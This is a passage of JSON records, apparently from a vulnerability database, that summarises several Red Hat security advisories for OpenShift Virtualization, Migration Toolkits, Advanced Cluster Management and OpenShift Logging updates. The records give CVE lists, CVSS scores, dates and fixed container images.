"CVE-2022-4883"], "modified": "2023-03-09T01:23:20", "id": "RHSA-2023:1174", "href": "https://access.redhat.com/errata/RHSA-2023:1174", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T16:22:44", "description": "The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.\n\nSecurity Fix(es) from Bugzilla:\n\n* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-15T01:56:18", "type": "redhat", "title": "(RHSA-2022:9047) Moderate: Migration Toolkit for Containers (MTC) 1.7.6 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-28851", "CVE-2020-28852", "CVE-2020-35525", "CVE-2020-35527", "CVE-2022-0561", "CVE-2022-0562", "CVE-2022-0865", "CVE-2022-0891", "CVE-2022-0908", "CVE-2022-0909", "CVE-2022-0924", "CVE-2022-1122", "CVE-2022-1304", "CVE-2022-1355", "CVE-2022-1705", "CVE-2022-1962", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22844", "CVE-2022-2509", "CVE-2022-25308", "CVE-2022-25309", "CVE-2022-25310", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-27664", "CVE-2022-28131", "CVE-2022-30293", "CVE-2022-30629", "CVE-2022-30630", "CVE-2022-30632", "CVE-2022-30633", "CVE-2022-30635", "CVE-2022-32148", "CVE-2022-32189", "CVE-2022-3515", "CVE-2022-37434", "CVE-2022-42898"], "modified": "2022-12-15T01:56:30", "id": "RHSA-2022:9047", "href": "https://access.redhat.com/errata/RHSA-2022:9047", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T16:23:12", "description": "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nSecurity Fix(es):\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)\n\n* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)\n\n* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api (BZ#2033191)\n\n* Restart of VM Pod causes SSH keys to be regenerated within VM (BZ#2087177)\n\n* Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR (BZ#2089391)\n\n* [4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass (BZ#2098225)\n\n* Fedora version in DataImportCrons is not 'latest' (BZ#2102694)\n\n* [4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted (BZ#2109407)\n\n* CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls (BZ#2110562)\n\n* Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based (BZ#2112643)\n\n* Unable to start windows VMs on PSI setups (BZ#2115371)\n\n* [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 (BZ#2128997)\n\n* Mark Windows 11 as TechPreview (BZ#2129013)\n\n* 4.11.1 rpms (BZ#2139453)\n\nThis advisory contains the following OpenShift Virtualization 4.11.1 images.\n\nRHEL-8-CNV-4.11\n\nvirt-cdi-operator-container-v4.11.1-5\nvirt-cdi-uploadserver-container-v4.11.1-5\nvirt-cdi-apiserver-container-v4.11.1-5\nvirt-cdi-importer-container-v4.11.1-5\nvirt-cdi-controller-container-v4.11.1-5\nvirt-cdi-cloner-container-v4.11.1-5\nvirt-cdi-uploadproxy-container-v4.11.1-5\ncheckup-framework-container-v4.11.1-3\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7\nkubevirt-template-validator-container-v4.11.1-4\nvirt-handler-container-v4.11.1-5\nhostpath-provisioner-operator-container-v4.11.1-4\nvirt-api-container-v4.11.1-5\nvm-network-latency-checkup-container-v4.11.1-3\ncluster-network-addons-operator-container-v4.11.1-5\nvirtio-win-container-v4.11.1-4\nvirt-launcher-container-v4.11.1-5\novs-cni-marker-container-v4.11.1-5\nhyperconverged-cluster-webhook-container-v4.11.1-7\nvirt-controller-container-v4.11.1-5\nvirt-artifacts-server-container-v4.11.1-5\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7\nlibguestfs-tools-container-v4.11.1-5\nhostpath-provisioner-container-v4.11.1-4\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.1-7\ncnv-containernetworking-plugins-container-v4.11.1-5\nbridge-marker-container-v4.11.1-5\nvirt-operator-container-v4.11.1-5\nhostpath-csi-driver-container-v4.11.1-4\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7\nkubemacpool-container-v4.11.1-5\nhyperconverged-cluster-operator-container-v4.11.1-7\nkubevirt-ssp-operator-container-v4.11.1-4\novs-cni-plugin-container-v4.11.1-5\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7\nkubevirt-tekton-tasks-operator-container-v4.11.1-2\ncnv-must-gather-container-v4.11.1-8\nkubevirt-console-plugin-container-v4.11.1-9\nhco-bundle-registry-container-v4.11.1-49", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-01T18:00:01", "type": "redhat", "title": "(RHSA-2022:8750) Moderate: OpenShift Virtualization 4.11.1 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-20107", "CVE-2016-3709", "CVE-2020-0256", "CVE-2020-35525", "CVE-2020-35527", "CVE-2021-0308", "CVE-2021-38561", "CVE-2022-0391", "CVE-2022-0934", "CVE-2022-1292", "CVE-2022-1304", "CVE-2022-1586", "CVE-2022-1785", "CVE-2022-1897", "CVE-2022-1927", "CVE-2022-2068", "CVE-2022-2097", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-24675", "CVE-2022-24795", "CVE-2022-24921", "CVE-2022-2509", "CVE-2022-25308", "CVE-2022-25309", "CVE-2022-25310", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-28327", "CVE-2022-29154", "CVE-2022-30293", "CVE-2022-30629", "CVE-2022-30698", "CVE-2022-30699", "CVE-2022-32206", "CVE-2022-32208", "CVE-2022-34903", "CVE-2022-3515", "CVE-2022-37434", "CVE-2022-38177", "CVE-2022-38178", "CVE-2022-40674"], "modified": "2022-12-01T18:00:15", "id": "RHSA-2022:8750", "href": "https://access.redhat.com/errata/RHSA-2022:8750", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T14:58:40", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.6.3 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/\n\nBugs addressed:\n\n* clusters belong to global clusterset is not selected by placement when rescheduling (BZ# 2129679)\n\n* RHACM 2.6.3 images (BZ# 2139085)\n\nSecurity fixes:\n\n* CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function \n Security\n\n* CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-14T19:39:55", "type": "redhat", "title": "(RHSA-2022:9040) Important: Red Hat Advanced Cluster Management 2.6.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-36516", "CVE-2020-36558", "CVE-2021-30002", "CVE-2021-3640", "CVE-2022-0168", "CVE-2022-0561", "CVE-2022-0562", "CVE-2022-0617", "CVE-2022-0854", "CVE-2022-0865", "CVE-2022-0891", "CVE-2022-0908", "CVE-2022-0909", "CVE-2022-0924", "CVE-2022-1016", "CVE-2022-1048", "CVE-2022-1055", "CVE-2022-1184", "CVE-2022-1304", "CVE-2022-1355", "CVE-2022-1852", "CVE-2022-20368", "CVE-2022-2078", "CVE-2022-21499", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22844", "CVE-2022-23960", "CVE-2022-24448", "CVE-2022-25255", "CVE-2022-2586", "CVE-2022-26373", "CVE-2022-2639", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-27950", "CVE-2022-28390", "CVE-2022-28893", "CVE-2022-2938", "CVE-2022-29581", "CVE-2022-30293", "CVE-2022-3517", "CVE-2022-36946", "CVE-2022-37434", "CVE-2022-41912", "CVE-2022-42898"], "modified": "2022-12-14T19:40:16", "id": "RHSA-2022:9040", "href": "https://access.redhat.com/errata/RHSA-2022:9040", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T16:22:44", "description": "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nRHEL-8-CNV-4.12\n\n==============\n\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-24T13:18:25", "type": "redhat", "title": "(RHSA-2023:0408) Important: OpenShift Virtualization 4.12.0 Images security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-20107", "CVE-2016-3709", "CVE-2020-0256", "CVE-2020-35525", "CVE-2020-35527", "CVE-2021-0308", "CVE-2021-38561", "CVE-2021-44716", "CVE-2021-44717", "CVE-2022-0391", "CVE-2022-0934", "CVE-2022-1292", "CVE-2022-1304", "CVE-2022-1586", "CVE-2022-1705", "CVE-2022-1785", "CVE-2022-1798", "CVE-2022-1897", "CVE-2022-1927", "CVE-2022-1962", "CVE-2022-2068", "CVE-2022-2097", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-23772", "CVE-2022-23773", "CVE-2022-23806", "CVE-2022-24795", "CVE-2022-2509", "CVE-2022-25308", "CVE-2022-25309", "CVE-2022-25310", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-28131", "CVE-2022-29526", "CVE-2022-30293", "CVE-2022-30629", "CVE-2022-30630", "CVE-2022-30631", "CVE-2022-30632", "CVE-2022-30633", "CVE-2022-30635", "CVE-2022-30698", "CVE-2022-30699", "CVE-2022-32148", "CVE-2022-32206", "CVE-2022-32208", "CVE-2022-34903", "CVE-2022-3515", "CVE-2022-37434", "CVE-2022-3787", "CVE-2022-40674", "CVE-2022-42898"], "modified": "2023-01-24T13:18:39", "id": "RHSA-2023:0408", "href": "https://access.redhat.com/errata/RHSA-2023:0408", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-25T18:22:39", "description": "Migration Toolkit for Applications 6.0.1 Images\n\nSecurity Fix(es) from Bugzilla:\n\n* loader-utils: prototype pollution in function parseQuery in parseQuery.js (CVE-2022-37601)\n\n* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing (CVE-2022-42920)\n\n* gin: Unsanitized input in the default logger in github.com/gin-gonic/gin (CVE-2020-36567)\n\n* glob-parent: Regular Expression Denial of Service (CVE-2021-35065)\n\n* express: \"qs\" prototype poisoning causes the hang of the node process (CVE-2022-24999)\n\n* loader-utils:Regular expression denial of service (CVE-2022-37603)\n\n* golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717)\n\n* json5: Prototype Pollution in JSON5 via Parse Method (CVE-2022-46175)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-28T00:48:46", "type": "redhat", "title": "(RHSA-2023:0934) Important: Migration Toolkit for Applications security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-36567", "CVE-2021-35065", "CVE-2021-46848", "CVE-2022-0561", "CVE-2022-0562", "CVE-2022-0865", "CVE-2022-0891", "CVE-2022-0908", "CVE-2022-0909", "CVE-2022-0924", "CVE-2022-1304", "CVE-2022-1355", "CVE-2022-2056", "CVE-2022-2057", "CVE-2022-2058", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22844", "CVE-2022-23521", "CVE-2022-24999", "CVE-2022-2519", "CVE-2022-2520", "CVE-2022-2521", "CVE-2022-25308", "CVE-2022-25309", "CVE-2022-25310", "CVE-2022-2601", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-2867", "CVE-2022-2868", "CVE-2022-2869", "CVE-2022-2953", "CVE-2022-30293", "CVE-2022-35737", "CVE-2022-37601", "CVE-2022-37603", "CVE-2022-3775", "CVE-2022-3787", "CVE-2022-3821", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41717", "CVE-2022-41903", "CVE-2022-42010", "CVE-2022-42011", "CVE-2022-42012", "CVE-2022-42898", "CVE-2022-42920", "CVE-2022-43680", "CVE-2022-46175", "CVE-2022-47629", "CVE-2023-21830", "CVE-2023-21835", "CVE-2023-21843"], "modified": "2023-03-01T00:30:47", "id": "RHSA-2023:0934", "href": "https://access.redhat.com/errata/RHSA-2023:0934", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T14:58:40", "description": "Openshift Logging Bug Fix Release (5.3.14)\n\nSecurity Fixe(s):\n\n* jackson-databind: denial of service via a large depth of nested objects\u00a0(CVE-2020-36518)\n\n* jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)\n\n* jackson-databind: use of deeply nested arrays (CVE-2022-42004)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-08T16:23:35", "type": "redhat", "title": "(RHSA-2022:8889) Moderate: Openshift Logging 5.3.14 bug fix release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-35525", "CVE-2020-35527", "CVE-2020-36516", "CVE-2020-36518", "CVE-2020-36558", "CVE-2021-30002", "CVE-2021-3640", "CVE-2022-0168", "CVE-2022-0561", "CVE-2022-0562", "CVE-2022-0617", "CVE-2022-0854", "CVE-2022-0865", "CVE-2022-0891", "CVE-2022-0908", "CVE-2022-0909", "CVE-2022-0924", "CVE-2022-1016", "CVE-2022-1048", "CVE-2022-1055", "CVE-2022-1184", "CVE-2022-1292", "CVE-2022-1304", "CVE-2022-1355", "CVE-2022-1586", "CVE-2022-1785", "CVE-2022-1852", "CVE-2022-1897", "CVE-2022-1927", "CVE-2022-20368", "CVE-2022-2068", "CVE-2022-2078", "CVE-2022-2097", "CVE-2022-21499", "CVE-2022-21618", "CVE-2022-21619", "CVE-2022-21624", "CVE-2022-21626", "CVE-2022-21628", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22844", "CVE-2022-23960", "CVE-2022-24448", "CVE-2022-2509", "CVE-2022-25255", "CVE-2022-2586", "CVE-2022-26373", "CVE-2022-2639", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-27950", "CVE-2022-28390", "CVE-2022-28893", "CVE-2022-2938", "CVE-2022-29581", "CVE-2022-30293", "CVE-2022-34903", "CVE-2022-3515", "CVE-2022-36946", "CVE-2022-37434", "CVE-2022-39399", "CVE-2022-42003", "CVE-2022-42004", "CVE-2022-42898"], "modified": "2022-12-08T16:23:58", "id": "RHSA-2022:8889", "href": "https://access.redhat.com/errata/RHSA-2022:8889", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T14:58:40", "description": "Logging Subsystem 5.5.5 - Red Hat OpenShift\n\nSecurity Fixe(s):\n\n* jackson-databind: denial of service via a large depth of nested objects\u00a0(CVE-2020-36518)\n\n* golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)\n\n* golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879, CVE-2022-2880, CVE-2022-41715)\n\n* jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)\n\n* jackson-databind: use of deeply nested arrays (CVE-2022-42004)\n\n* loader-utils: Regular expression denial of service (CVE-2022-37603)\n\n* golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service (CVE-2022-32189)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-08T07:35:26", "type": "redhat", "title": "(RHSA-2022:8781) Moderate: Logging Subsystem 5.5.5 - Red Hat OpenShift security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 